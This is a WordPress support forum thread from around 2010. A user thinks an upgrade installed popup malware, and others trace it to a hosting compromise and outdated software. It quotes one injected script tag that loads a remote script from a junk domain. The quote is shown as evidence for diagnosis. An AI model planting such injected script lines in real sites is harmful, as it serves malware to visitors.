URGENT HELP! WP upgrade installed spam!

  • Mike

    (@creditcardforum)


    14 years, 10 months ago

    I just upgraded WP on one of my blogs manually and it’s installed a popup scam security ad on my blog! Please go to creditcardforum dot com /blog in Internet Explorer to see (doesn’t do it in Firefox). Please help. How do I get rid of this?!

Viewing 8 replies - 1 through 8 (of 8 total)
  • Thread Starter Mike

    (@creditcardforum)

    </div> <!-- Footer div -->
</div> <!-- Wrapper div -->

<script src="https://kdjkfjskdfjlskdjf.com/kp.php"></script>
</body>
</html>

    That’s what’s in your footer! index.php, page.php, etc. are all infected with malicious code… I DOWNLOADED 2.9.2 DIRECTLY FROM www.ads-software.com! Someone needs to stop this!

    Thread Starter Mike

    (@creditcardforum)

    Anyone home? This is urgent… I’m not talking about myself, but rather everyone else that is downloading these infected files from www.ads-software.com! I just restored my DB and files to pre-update. I’m going through the files downloaded from WordPress and these are so infected it’s not even funny. Someone needs to pull the 2.9.2 corrupt files ASAP I can’t even imagine how many people are being affected by this and probably don’t even know it.

    I just downloaded 2.9.2 and looked in index.php and page.php and did not see anything to match your code, my index file only has two real lines of code.

    Moderator James Huff

    (@macmanx)

    I just looked through the source of the index.php and page.php files from the Default and Classic themes and the main index.php file from WordPress 2.9.2. I see absolutely no reference to any sort or malware or the script tag that you posted. Are your sure the malware is not in your own theme or perhaps being added by a plugin?

    Moderator James Huff

    (@macmanx)

    Looking a some earlier threads, I bet your blog is either hosted with GoDaddy or subject to the same vulnerability. See these for more info:

    https://www.ads-software.com/support/topic/391658

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked

    @creditcardforum: Google that URL string and read the hack reports. You on Network Solutions? :

    https://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html

    and

    https://blog.sucuri.net/2010/05/new-infections-today-at-network.html

    @creditcardforum

    Your source code says you are currently using WordPress 2.6.

    <meta name="generator" content="WordPress 2.6" />

    I also noted you are running a potentially vulnerable version of vBulletin at your domain root.

    <meta name="generator" content="vBulletin 3.6.11" />

    I think I read somewhere quite a while back about some serious XXS vulnerabilities in version 3.6.11 ( if left un-patched ).

    Just some food for thought while analyzing how you may have gotten hacked.

    [edit] and I see you are indeed hosted by GoDaddy.

    closing this hysterical thread as bunk – posted twice, anyway

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘URGENT HELP! WP upgrade installed spam!’ is closed to new replies.